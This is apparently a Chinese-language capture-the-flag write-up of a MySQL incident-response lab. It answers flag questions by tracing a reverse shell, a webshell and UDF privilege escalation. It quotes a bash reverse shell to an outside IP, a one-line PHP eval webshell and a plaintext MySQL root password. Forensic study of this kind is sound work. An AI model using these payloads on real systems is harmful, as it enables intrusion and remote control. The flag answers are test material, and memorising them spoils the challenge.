第二章-日志分析-Mysql应急响应

1.黑客第一次写入的shell flag{关键字符串}
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}
在/tmp/1.sh中反弹了shell
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
放到河马查杀，得到sh.php

1
2
3

1 2 <?php @eval($_POST['a']);?> 4  
  
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b  

根据上面写入webshell的格式 所以猜测可能是udf提权
查看源码得到mysql密码

1
2
3
4
5

<?php  
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");  
if(!$conn){  
echo "数据库连接失败";  
}  

show variables like '%plugin%';
cd /usr/lib/mysql/plugin/ 得到 udf.so
ps -aux查看mysql服务是以什么用户启动的
因为是mysql用户启动，所以提权后也是mysql用户的权限
flag{mysql}